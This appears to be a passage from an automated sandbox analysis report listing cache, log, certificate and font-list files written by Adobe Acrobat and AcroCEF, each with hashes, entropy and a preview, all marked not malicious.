Preview:	2024/12/17-02:38:27.609 1620 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:27.611 1620 Recovering log #3.2024/12/17-02:38:27.611 1620 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.1870699308845145
Encrypted:	false
SSDEEP:	6:7JuVq2PsZ2nKuAl9OmbnIFUt8OzgZmw+OzIkwOsZ2nKuAl9OmbjLJ:7JuVvkcHAahFUt8Ozg/+OzI51cHAaSJ
MD5:	5B21C8AE944B1A08C72D54A6991B0AB6
SHA1:	890E708BCF60A491026C16F8EB1002E9DDD0C12F
SHA-256:	E9473A00908BE3375D54B900367F5C94C153E550350CD7071A77DEE898A96BE4
SHA-512:	CF2D34C0C279C16E1DE9BD2DCBCD5798D9267366EA8A7D02D2F926137EA56A87944A4A3A9767B3B8B5CB61FB2E51476C0B6BB307284AA31D9743EF47091EA998
Malicious:	false
Preview:	2024/12/17-02:38:27.609 1620 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:27.611 1620 Recovering log #3.2024/12/17-02:38:27.611 1620 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.21069351745315
Encrypted:	false
SSDEEP:	6:78Fd4q2PsZ2nKuAl9Ombzo2jMGIFUt8OXZmw+OyFnFkwOsZ2nKuAl9Ombzo2jMmd:78Fd4vkcHAa8uFUt8OX/+OsF51cHAa8z
MD5:	82EF9EF6BE00EE2B652BD6C0F1EB590D
SHA1:	169EA32036A13FF327373B37789F175C149125D1
SHA-256:	D3D421B2999AEDEE3E5CC07DC51B3636C6613042DE97598557FA83664D414702
SHA-512:	2D27A63B6F73C83861D3E79D7378799A4B39B38FA5B2CF67BC1B0A570C6505B0D30CE8D50C7E3B469E89D46B0BF5917FFAC23ED927D6A674B7B03589FFC4DC5C
Malicious:	false
Preview:	2024/12/17-02:38:27.676 8f4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:27.677 8f4 Recovering log #3.2024/12/17-02:38:27.678 8f4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.21069351745315
Encrypted:	false
SSDEEP:	6:78Fd4q2PsZ2nKuAl9Ombzo2jMGIFUt8OXZmw+OyFnFkwOsZ2nKuAl9Ombzo2jMmd:78Fd4vkcHAa8uFUt8OX/+OsF51cHAa8z
MD5:	82EF9EF6BE00EE2B652BD6C0F1EB590D
SHA1:	169EA32036A13FF327373B37789F175C149125D1
SHA-256:	D3D421B2999AEDEE3E5CC07DC51B3636C6613042DE97598557FA83664D414702
SHA-512:	2D27A63B6F73C83861D3E79D7378799A4B39B38FA5B2CF67BC1B0A570C6505B0D30CE8D50C7E3B469E89D46B0BF5917FFAC23ED927D6A674B7B03589FFC4DC5C
Malicious:	false
Preview:	2024/12/17-02:38:27.676 8f4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:27.677 8f4 Recovering log #3.2024/12/17-02:38:27.678 8f4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0a3d570c-f98f-4c29-a166-a0ea49a21e5a.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	476
Entropy (8bit):	4.959572480901946
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqhS4hsBdOg2H9Bcaq3QYiubPyP7E4TX:Y2sRdsIydMHe3QYhbC7n7
MD5:	B292CD05D8BCF2379C88B4DEE5D2C74B
SHA1:	60CE1FDEB2E3174C084105D15C3891D239C8A962
SHA-256:	D51AFADBAC940DF58880D2D7CBBDE1E07281571805DD691E226AEAC38A3EFDAB
SHA-512:	25D9DA09662CA5968B0CC4390F795D8DC171BD03E27B8716056D4228F23592949E0F11BCD0D56BBA303DF8A9EEC70B821E71DDE1C27C94360E18ACEFD0F6E417
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378981117683106","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":631856},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	476
Entropy (8bit):	4.971308936549284
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
MD5:	9DED1C09A5BF5786A6517CEEA68DC0C7
SHA1:	F3213474F6BB0938812FFECD151F8FC6726CCBAC
SHA-256:	F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
SHA-512:	7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF576162.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	476
Entropy (8bit):	4.971308936549284
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
MD5:	9DED1C09A5BF5786A6517CEEA68DC0C7
SHA1:	F3213474F6BB0938812FFECD151F8FC6726CCBAC
SHA-256:	F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
SHA-512:	7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b2121508-fdd1-4f2d-85be-2dd4ed7fc30c.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	476
Entropy (8bit):	4.971308936549284
Encrypted:	false
SSDEEP:	12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
MD5:	9DED1C09A5BF5786A6517CEEA68DC0C7
SHA1:	F3213474F6BB0938812FFECD151F8FC6726CCBAC
SHA-256:	F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
SHA-512:	7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4553
Entropy (8bit):	5.23728979399674
Encrypted:	false
SSDEEP:	96:odxquQuhxqVAq0Czrh6CzxtSzK3/tjsqnlfjejy4XOlPXflcLmDd:oqupGVTbzrhtzxtSzK3/dRnlLejyE4vJ
MD5:	61655C6F0FD78FE8699D17F506851BD6
SHA1:	D0E434E0B64F7F60DFCDBEC708C5CAFF1C5958AE
SHA-256:	B4FD6C676F27F19F8926DBFE38699A95A405D819F08E1AF2BEC2494314E77D69
SHA-512:	8E3DD9FEC8486907EE30E9373240102BDDCE4A3171A17065B69BD230AFCA4297D26FC4F67CB5E111ABC7B4135F8C83CABC0C81B818F2174D835475F28C75A64B
Malicious:	false
Preview:	*...#................version.1..namespace-n.X.o................next-map-id.1.Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/.0gKY.r................next-map-id.2.Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.1^b..r................next-map-id.3.Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/.3C[.[^...............Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/D..B^...............Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/..Ga...............Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.;0ca...............Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.\.go................next-map-id.5.Pnamespace-5e456334_9beb_4082_9dbc_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.20835636287888
Encrypted:	false
SSDEEP:	6:7MsMq2PsZ2nKuAl9OmbzNMxIFUt8OMnJZmw+OMnDkwOsZ2nKuAl9OmbzNMFLJ:76vkcHAa8jFUt8OG/+O651cHAa84J
MD5:	61086F8D91CBDD67417E1CF96E443271
SHA1:	8B4CB07A22D2DE08D3CBAA084A46BC6455179C94
SHA-256:	AB839ACFB8D8CB1B74FB5D01F8082DA90122E34CFA656B2E4A0D4842662AC295
SHA-512:	B92B6AA1E0DF0D70654EB3F4A1EFCC385E318ADCDD885EFB51E79F50008597800BB56E14C1D39F56083354B9D10A56FFA3731D5C44AC543C333CE5AFCD823FCE
Malicious:	false
Preview:	2024/12/17-02:38:27.970 8f4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:27.971 8f4 Recovering log #3.2024/12/17-02:38:27.971 8f4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.20835636287888
Encrypted:	false
SSDEEP:	6:7MsMq2PsZ2nKuAl9OmbzNMxIFUt8OMnJZmw+OMnDkwOsZ2nKuAl9OmbzNMFLJ:76vkcHAa8jFUt8OG/+O651cHAa84J
MD5:	61086F8D91CBDD67417E1CF96E443271
SHA1:	8B4CB07A22D2DE08D3CBAA084A46BC6455179C94
SHA-256:	AB839ACFB8D8CB1B74FB5D01F8082DA90122E34CFA656B2E4A0D4842662AC295
SHA-512:	B92B6AA1E0DF0D70654EB3F4A1EFCC385E318ADCDD885EFB51E79F50008597800BB56E14C1D39F56083354B9D10A56FFA3731D5C44AC543C333CE5AFCD823FCE
Malicious:	false
Preview:	2024/12/17-02:38:27.970 8f4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-02:38:27.971 8f4 Recovering log #3.2024/12/17-02:38:27.971 8f4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241217073832Z-176.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	2.0752048305801134
Encrypted:	false
SSDEEP:	192:/lQyM25/EUUgRdV9rdZU2HstTjhmf0RAwwBl5df6Z:TUydbdTHITjO0OwwBfV6Z
MD5:	794D979E13F7687134B9C884DA152DD8
SHA1:	7AF0AFABF4D27CFC163F538C6BE2698BB52F34BC
SHA-256:	3048C73D42066D6BE4B08245D2570F4D97D15AC800F8ED784A6C4F4A354187F0
SHA-512:	C924F98B2D7BFE4712FA3308FDA58D08479520AC31A288A3413FBBCF8263CA1CE5340EE6BCB20D261918F9B3FCFFC3D41A62068B57E2E9DFA579451458EA8B34
Malicious:	false
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.438750998063252
Encrypted:	false
SSDEEP:	384:yeCci5G1iBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:N5urVgazUpUTTGt
MD5:	425B9F14DAADC0F9FEFE3356B543EFEE
SHA1:	DD19F94D34A5DBEFB2FFBC3B9AF26DECB78766B5
SHA-256:	D552CA096F503433B157B575F56CCA19948D2276055B86CB84757353A39754D4
SHA-512:	16AFF1585FBBC81D68B42016C7F77421F79626C1F79FEE8B0343F094A5607CAA1F464A7C378AFECF9D8F2BA1E3D88879EC4368FA33C5815DB5490A7F239BE0CA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.76937416289544
Encrypted:	false
SSDEEP:	48:7MI2JioyVTioyzoy1C7oy16oy1RKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1U:7x2JuTRAXjBiTb9IVXEBodRBkQ
MD5:	E7409AE5E88A7CD16809DEF240BF65C1
SHA1:	31FEBC4C577A07BC85B0456C3A1A0651B6B95EEF
SHA-256:	D0C64E592997F41CB10F93580921F89C05E2BD5911FDBB0BC2C352CF93DA7FA8
SHA-512:	BF698EB09021951FF0970A825F29B9AC9B4772619355D25BD245D2051DE7A904A8490E405BAEF47FAD4BA37CA0F190A930997D5252EF802FB6A39ECE3B866936
Malicious:	false
Preview:	.... .c........G...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.756901573172974
Encrypted:	false
SSDEEP:	3:kkFklUPvVjfllXlE/HT8kxzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKNPNsT8IdNMa8RdWBwRd
MD5:	7A99980DA80D4FB1AEA2300D8F63D096
SHA1:	7AD7360111A97FECA1D7C5707AE0417C20237A72
SHA-256:	CBE11AA28A9658D4A8383C4C9ECBF1DB464295F0FB3D7112A1849797AA5A7560
SHA-512:	5578E68ADDDA709504A57E824A7519B33A9C048E883AAB62164587619E8B192712D6AECD7186D12F0B71C04D86293768BA9811987F00AA2419680678B29668E3
Malicious:	false
Preview:	p...... ........gj..VP..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.2539954282295116
Encrypted:	false
SSDEEP:	6:kKAi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:oDImsLNkPlE99SNxAhUe/3
MD5:	C58F17EB89196E6DCB543B809EBC9127
SHA1:	9AC1BB004BA0C03D2E16261634795B7C839CCCD9
SHA-256:	A720CCC4BF93E31194F7ECAEE1898F33A84F8B6A3655B072961B7595373DE516
SHA-512:	D4F0580D7C967B9CC0F70F0C1D17AA0C8FCC36CC4479A6B3DF29B8273D60BA7F9CFE8B41D6F482BAE30E355FC3F6F6BC4280F93AF6ECB787422D4CEF16679B75
Malicious:	false
Preview:	p...... ........?.`.VP..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.604

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
